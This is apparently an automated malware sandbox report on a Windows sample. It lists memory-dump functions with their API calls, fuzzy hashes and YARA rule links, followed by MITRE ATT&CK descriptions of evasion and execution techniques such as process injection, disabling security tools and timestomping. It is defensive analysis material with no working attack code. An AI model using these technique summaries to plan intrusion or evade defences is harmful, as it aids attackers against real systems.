
Similarity

API ID: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorEvent
String ID:
API String ID: 3096193188-0
Opcode ID: ddc06d01f2898599a057a826e35ba0f5972abce72a083621ab5ca8b41d632516
Instruction ID: 67a5bfd9cf9c47867f39cf620a60de46fbf500815cc4b36fe5a6b69dd95ac853
Opcode Fuzzy Hash: ddc06d01f2898599a057a826e35ba0f5972abce72a083621ab5ca8b41d632516
Instruction Fuzzy Hash: 4171DF71A002489FDF25DFA8C945BAEBBF4EF16314F14015DE81A972C1CB746E89CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A90CF0, Relevance: 6.2, APIs: 4, Instructions: 213networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00A90DAF
setsockopt.WS2_32(00000000,00000029,0000001B,?,00000004), ref: 00A90DE8
CreateIoCompletionPort.KERNEL32(00000000,?,00000000,00000000), ref: 00A90E2D
GetLastError.KERNEL32 ref: 00A90E37

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CompletionCreateErrorLastPortSocketsetsockopt
String ID:
API String ID: 1324823626-0
Opcode ID: 0876f68aadf6b5a0099360e996391f514c1601e9cb8ef0f34b8d86a5d9a095cd
Instruction ID: 794c570c8b9df0015b19816292c0d0be7e2d7e1dcf327db0c25acd068eef6ebb
Opcode Fuzzy Hash: 0876f68aadf6b5a0099360e996391f514c1601e9cb8ef0f34b8d86a5d9a095cd
Instruction Fuzzy Hash: 68919171A00749CFCF10CF68D894B9EBBF0EF45360F10865AE825AB391D7B5A984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A98550, Relevance: 6.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00A98608

Part of subcall function 00AAEB10: ___std_exception_copy.LIBVCRUNTIME ref: 00AAEB52
Part of subcall function 00AAEB10: ___std_exception_copy.LIBVCRUNTIME ref: 00AAEBC2

Part of subcall function 00A97C70: SetEvent.KERNEL32(00000000,00DA8488), ref: 00A97D11

___std_exception_destroy.LIBVCRUNTIME ref: 00A98637

Part of subcall function 00A97B50: SetEvent.KERNEL32(00000000), ref: 00A97C14

___std_exception_copy.LIBVCRUNTIME ref: 00A986A1
___std_exception_destroy.LIBVCRUNTIME ref: 00A986D0

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ___std_exception_copy$Event___std_exception_destroy
String ID:
API String ID: 3653323322-0
Opcode ID: ec85726376f3766712d7c772c7ef5f13610ae2e589d18c039cd98926b3085127
Instruction ID: 91724d8130456360aedfe387d1e53b82fd94e48eae99b1330a8a2a23dcef05e6
Opcode Fuzzy Hash: ec85726376f3766712d7c772c7ef5f13610ae2e589d18c039cd98926b3085127
Instruction Fuzzy Hash: CB51CE70A01208DFDF14DFA4D984BEEBBF5AF06314F24061AE411AB381DB749A84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A950D0, Relevance: 6.2, APIs: 4, Instructions: 164COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?), ref: 00A95145
GetCurrentProcess.KERNEL32 ref: 00A951BB
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002), ref: 00A951D5
SetEvent.KERNEL32(00000000,00000000), ref: 00A95259

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Handle$CloseCurrentDuplicateEventProcess
String ID:
API String ID: 302482954-0
Opcode ID: e5c126231b1fc2663d434be2068013c849843baef06e54703e9cbf2564b0fffa
Instruction ID: 9fb3f9bdc0adfe4a8fc6d546e4a870f10a5e67b01f4a8a775df329d3606e6721
Opcode Fuzzy Hash: e5c126231b1fc2663d434be2068013c849843baef06e54703e9cbf2564b0fffa
Instruction Fuzzy Hash: 5E517DB0A04605EFEB21DF64D946B99BBF4FB04310F204259E815AB291DB70AD45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8C490, Relevance: 6.2, APIs: 4, Instructions: 160windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,00DA8488), ref: 00A8C4E3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000400,?,00000000,00000000,00DA8488), ref: 00A8C517
LocalFree.KERNEL32(00000000,-00000001,00000000,?,00000400,?,00000000,00000000,00DA8488), ref: 00A8C655

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ByteCharFormatFreeLocalMessageMultiWide
String ID:
API String ID: 2906450291-0
Opcode ID: 394f292b20a36eb5e60e4d07dded7325a73c90e7b2437dbb9e0fc5de044c0d2b
Instruction ID: 9600e2104392572fdc85315e23d790771a61ffd5bf1f74021e69b2c250e2b7da
Opcode Fuzzy Hash: 394f292b20a36eb5e60e4d07dded7325a73c90e7b2437dbb9e0fc5de044c0d2b
Instruction Fuzzy Hash: 7C51D370A00249ABEF14EF98CC55BEEBBB5FF48320F245229E411B76C1D7B069848B61

Uniqueness

Uniqueness Score: -1.00%

Function 00A96F20, Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000,00DA8488), ref: 00A96FBF
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00A96FEC
SetEvent.KERNEL32(00000000), ref: 00A970A0
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 00A970CD

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorEvent
String ID:
API String ID: 3096193188-0
Opcode ID: 4097b4299b26145e9d4c9cb02f7b22a9b42a5651e39c0e7ea2ac3bd57cae8f5a
Instruction ID: 0088a4f1d0e3f27b5eb3157488c90c8250e53cebcba8bb84c3dd5dcbab6cf4f3
Opcode Fuzzy Hash: 4097b4299b26145e9d4c9cb02f7b22a9b42a5651e39c0e7ea2ac3bd57cae8f5a
Instruction Fuzzy Hash: 77510E71A096488FDF25CFA8C915BEEBBF4EF09314F14015EE84697781CB34690ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2176F, Relevance: 6.1, APIs: 4, Instructions: 144COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00C217F7

Part of subcall function 00C1EB34: __aulldvrm.LIBCMT ref: 00C1EB65

DName::operator+.LIBCMT ref: 00C21804
DName::operator=.LIBVCRUNTIME ref: 00C21884
DName::DName.LIBVCRUNTIME ref: 00C218A4

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 3a4884b211ac5099aa8b670a1503c002cc8eda836eab0d420af504e752b854ae
Instruction ID: 339e14ec988c6a5abdfcb2b889f1eb01e3559058e29baf74e300e4ab76e4de68
Opcode Fuzzy Hash: 3a4884b211ac5099aa8b670a1503c002cc8eda836eab0d420af504e752b854ae
Instruction Fuzzy Hash: CA517A70900329EFDB15DF58E890AADBBB4FF16340F19819AE8219B391D7719B80DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C1B85E, Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00C1B8AF
TypeidsEqual.LIBVCRUNTIME ref: 00C1B8D4
PMDtoOffset.LIBCMT ref: 00C1B8EA
PMDtoOffset.LIBCMT ref: 00C1B96B

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction ID: 0eeab5067462c54839ff863ebbdbedc2f662561a489e484b0e48c7c48399eeb8
Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
Instruction Fuzzy Hash: A7519C359042099FDF11CF69C481AEEFBF5EF46310F14449AE9A0A7351D732AE8A9F90

Uniqueness

Uniqueness Score: -1.00%

Function 00A8D660, Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL ref: 00A8D691
RtlLeaveCriticalSection.NTDLL(?), ref: 00A8D6F6
RtlEnterCriticalSection.NTDLL(?), ref: 00A8D717
RtlLeaveCriticalSection.NTDLL(?), ref: 00A8D77F

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 9e0031e734851531d172af0000b16d8a1710f39ad1b8b7b435e809281a15db0a
Instruction ID: ff49a382287304659b2ad7a63412d1c63526bdcdf86caaaf767535e24e4e6b69
Opcode Fuzzy Hash: 9e0031e734851531d172af0000b16d8a1710f39ad1b8b7b435e809281a15db0a
Instruction Fuzzy Hash: DD4161B5A006059BDB24DF65C984B6AFBB8FF44750F18856DE81ADB790E771EC00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8EE70, Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00A8EEB8
closesocket.WS2_32 ref: 00A8EECE
ioctlsocket.WS2_32(?,8004667E,?), ref: 00A8EF3D
closesocket.WS2_32 ref: 00A8EF4A

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: closesocket$ioctlsocketsetsockopt
String ID:
API String ID: 566113833-0
Opcode ID: f0b680dda2be601ed54d67165f3d9a331e4a5bf8d7f130e59bc70538994717b4
Instruction ID: 2ff2d331993fce295f191170342fc5b6527cb9730c76997f12a72791cb7497c9
Opcode Fuzzy Hash: f0b680dda2be601ed54d67165f3d9a331e4a5bf8d7f130e59bc70538994717b4
Instruction Fuzzy Hash: BE31B971A00205EBCB20EB69D888A6DFBE4EF05761F1446AAFD09EB391D7749D44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A95420, Relevance: 6.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32(00000000,00009875,00000000,00DA8488,?,00DA8488,?,00DA8488,?,00C56E90,000000FF,?,00A96EF4,?,00DA8488), ref: 00A95471
ReleaseSemaphore.KERNEL32(?,?,00000000,?,00DA8488,?,00C56E90,000000FF,?,00A96EF4,?,00DA8488), ref: 00A95494
CloseHandle.KERNEL32(00000000), ref: 00A954C4
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C5C9C0,000000FF), ref: 00A954FE

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ReleaseSemaphore$CloseEventHandle
String ID:
API String ID: 4139662584-0
Opcode ID: 36288db627e45ff75a7e99ce981844488d8f2751d663360e775b3ee0c7801619
Instruction ID: aa8fc86a93ac641accbb2ff630dc6ed629433710bcfd24aee26fb34a80391c76
Opcode Fuzzy Hash: 36288db627e45ff75a7e99ce981844488d8f2751d663360e775b3ee0c7801619
Instruction Fuzzy Hash: DD31BF71B00A06EFDF21CF29C881B29B7E9FF48314F144629E819CB291D771EC948BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C36728, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8141e02ddd2f29fbe4e5c2dacbae14fbb8950bc18eecaf86a4fe83697d972258
Instruction ID: fb8b450cba2619ce8493032a1bf9f58767baa50577c81faf547e98fd889e9f89
Opcode Fuzzy Hash: 8141e02ddd2f29fbe4e5c2dacbae14fbb8950bc18eecaf86a4fe83697d972258
Instruction Fuzzy Hash: 2321DA75A11724BBCB319B35DC84B6E37989F03B68FA58510ED26E7290D770DE40C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00C36300, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000004,00C267A2,00000000,00000000,00000000,?,00C3A292,00000000,00000000,?,00DBAB34,00000000), ref: 00C36305
_free.LIBCMT ref: 00C36362
_free.LIBCMT ref: 00C36398
SetLastError.KERNEL32(00000000,00DA88A0,000000FF,?,00C3A292,00000000,00000000,?,00DBAB34,00000000), ref: 00C363A3

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 4c11b3756e7be6c389950778d2b9ce8c2e639af4dd51df523d4ebd61dbc91c2b
Instruction ID: 67983f5a704f4c3974ee9d1fe741d0a8a698b369cbbff1b8a6d93b3f1f01145a
Opcode Fuzzy Hash: 4c11b3756e7be6c389950778d2b9ce8c2e639af4dd51df523d4ebd61dbc91c2b
Instruction Fuzzy Hash: 511125322246007FCA6037B9AC82D2F25A9EBD5374FA68624F535D22F1EF748D05B130

Uniqueness

Uniqueness Score: -1.00%

Function 6D856256, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000016,00000000,6D847140,00000016,?,6D8471A5,00000000,00000000,00000000,00000000,00000000,6D855B82,00000000,?,6D838B88), ref: 6D85625B
_free.LIBCMT ref: 6D8562B8
_free.LIBCMT ref: 6D8562EE
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6D8471A5,00000000,00000000,00000000,00000000,00000000,6D855B82,00000000,?,6D838B88,00000000,00000000), ref: 6D8562F9

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 2b15e8492defd998183f3abf1bd6f051d7346e698ad26004ce07f13e0a885560
Instruction ID: 8748746e5fb4b0a0c4bbee774d19e4bd5501c519483ce86ea32ec2b7fb056e82
Opcode Fuzzy Hash: 2b15e8492defd998183f3abf1bd6f051d7346e698ad26004ce07f13e0a885560
Instruction Fuzzy Hash: 9811C63224C3026BDBC1177C5C8EE3B666EEBC33797264E34FA25965D0EB618C3541A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C36457, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00C2A296,00C37E5D,?,?,00C1B338,?,?,?,?,?,00A8A91D,00C18D42,?), ref: 00C3645C
_free.LIBCMT ref: 00C364B9
_free.LIBCMT ref: 00C364EF
SetLastError.KERNEL32(00000000,00DA88A0,000000FF,?,00C1B338,?,?,?,?,?,00A8A91D,00C18D42,?,?,00C18D42), ref: 00C364FA

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: de6805854823fdc3b69c1d2f3d1858c72d7cc2f7cd7b97eff64f3b6332267b2a
Instruction ID: 0f169f5a5eecf73b28370e9b5daef2a220df4fff444767a2629ad60d38dcd3fb
Opcode Fuzzy Hash: de6805854823fdc3b69c1d2f3d1858c72d7cc2f7cd7b97eff64f3b6332267b2a
Instruction Fuzzy Hash: 15114832A206007ECA21B7F96C81D2B75A99BC1374F61C224F938D62D1DF658D05B130

Uniqueness

Uniqueness Score: -1.00%

Function 00C24ED8, Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,?,00C24F99,000000FF,00C6A49A,00000000,?,?,00C2504B,00000002,00D4255C,00D439C8,00D439D0), ref: 00C24F68

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 53de0d6bdfa2d31f9d295d945014620cdf17ada80cc2634247825b9584e661e5
Instruction ID: 14962d63cf70314e9b74091b15bc129081d4f33dffcae1883659202e272072c8
Opcode Fuzzy Hash: 53de0d6bdfa2d31f9d295d945014620cdf17ada80cc2634247825b9584e661e5
Instruction Fuzzy Hash: 6B11C636A40631BBDF369BA9AD40B5D7794AF42770F150150F935EB680D7B0EE008AE5

Uniqueness

Uniqueness Score: -1.00%

Function 00C44692, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00C4297C,00000000,00000001,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C446A9
GetLastError.KERNEL32(?,00C4297C,00000000,00000001,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00C446B5

Part of subcall function 00C4467B: CloseHandle.KERNEL32(00DA8FE0,00C446C5,?,00C4297C,00000000,00000001,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00C4468B

___initconout.LIBCMT ref: 00C446C5

Part of subcall function 00C4463D: CreateFileW.KERNEL32(00D4FBF8,40000000,00000003,00000000,00000003,00000000,00000000,00C4466C,00C42969,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00C44650

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00C4297C,00000000,00000001,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00C446DA

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 4c14b7d86fcf2e3fe089989098925a7450669cb632b53b3275527989cd3154a4
Instruction ID: f3a1aa17327b8a02f713e72c422c06641296fb7644910d8191c47fea17e9f63d
Opcode Fuzzy Hash: 4c14b7d86fcf2e3fe089989098925a7450669cb632b53b3275527989cd3154a4
Instruction Fuzzy Hash: 6FF01C36440215BBCF221F92DC04FDE3F67FF4A3A0B254010FA28C6120CB328D60AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C359BD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00C35A4D

Strings

pow, xrefs: 00C35A25, 00C35A42

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 50fd6e2e410dc40f1d00eec0dc84abc04f37013dc2861b6a530858da5f1187ff
Instruction ID: 816b1e821b35441921d961ebf15d922770251dc26b84cb596d48daf23b6e0fb0
Opcode Fuzzy Hash: 50fd6e2e410dc40f1d00eec0dc84abc04f37013dc2861b6a530858da5f1187ff
Instruction Fuzzy Hash: 15519CA1A68A06CBCB117B58CD813797BA0FB40711F304F58E1E5862E9EE318DD5FA47

Uniqueness

Uniqueness Score: -1.00%

Function 00AA1560, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001,00DA8488), ref: 00AA15B2
GetLastError.KERNEL32 ref: 00AA15BC

Strings

pqcs, xrefs: 00AA161B

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CompletionErrorLastPostQueuedStatus
String ID: pqcs
API String ID: 1506555858-2559862021
Opcode ID: 1a24a8aacf47d1ff7f04ffd55e6f133d77b8150b6bfc418ab7292ce0a76def23
Instruction ID: 0addf42b34880f08d0ebe6e9dbc459813308ab4dd96c194c29a526bd045b3593
Opcode Fuzzy Hash: 1a24a8aacf47d1ff7f04ffd55e6f133d77b8150b6bfc418ab7292ce0a76def23
Instruction Fuzzy Hash: 3421E131A006169FCB24CF15C800B6EBBF8FF86724F14816DE806D76A0EB31AD05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A8F0F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00A8F10E
WSAGetLastError.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00A8F116

Strings

M', xrefs: 00A8F14F

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: ErrorLastSend
String ID: M'
API String ID: 3410151345-2701432540
Opcode ID: df8b718908fb925cec7c692e83e7022fa28b2c78ee8b823fadfbf55f18852212
Instruction ID: 959b9c3e1b90670317cb5e9bb0a416ebff2d48e4f4dca6e44a1e472f5de302a8
Opcode Fuzzy Hash: df8b718908fb925cec7c692e83e7022fa28b2c78ee8b823fadfbf55f18852212
Instruction Fuzzy Hash: FB21717190030ADFDB20DF59D8487AEBBF4EF95320F208A5AE969E7751D770A9448B80

Uniqueness

Uniqueness Score: -1.00%

Function 00A8EB60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(00000001,00000001,00000001,00000001), ref: 00A8EB89
GetLastError.KERNEL32 ref: 00A8EB93

Strings

pqcs, xrefs: 00A8EBB2

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: CompletionErrorLastPostQueuedStatus
String ID: pqcs
API String ID: 1506555858-2559862021
Opcode ID: c70d4f4adc03f3850d6d40ede326d760f41614f91c15fdf541fa07a75676646f
Instruction ID: 86ac4224ba706be129f3a293a775d31dd0d4b4064e24e3d6e840d07a282d8363
Opcode Fuzzy Hash: c70d4f4adc03f3850d6d40ede326d760f41614f91c15fdf541fa07a75676646f
Instruction Fuzzy Hash: 0421D5B1A00609EFDB20DF58D800B9AB7F8EB45714F1082AEE815D7780E7B19D048B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A2E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(00DA8488), ref: 00A8A30D
GetLastError.KERNEL32 ref: 00A8A31A

Strings

tss, xrefs: 00A8A357

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: AllocErrorLast
String ID: tss
API String ID: 4252645092-1638339373
Opcode ID: 2eae14682ced09fc256b249a2768dd7522f0dad23f4dfac2be8ca9ee433cece0
Instruction ID: a1474ef3c546f63999d69d9574cdab3e2997d7a133af0203af4afcd3bfc1b044
Opcode Fuzzy Hash: 2eae14682ced09fc256b249a2768dd7522f0dad23f4dfac2be8ca9ee433cece0
Instruction Fuzzy Hash: 1C01B571D44605EBCB10FFA4ED4279E7BB8EB05710F600266EC25E37C0EB7459489692

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
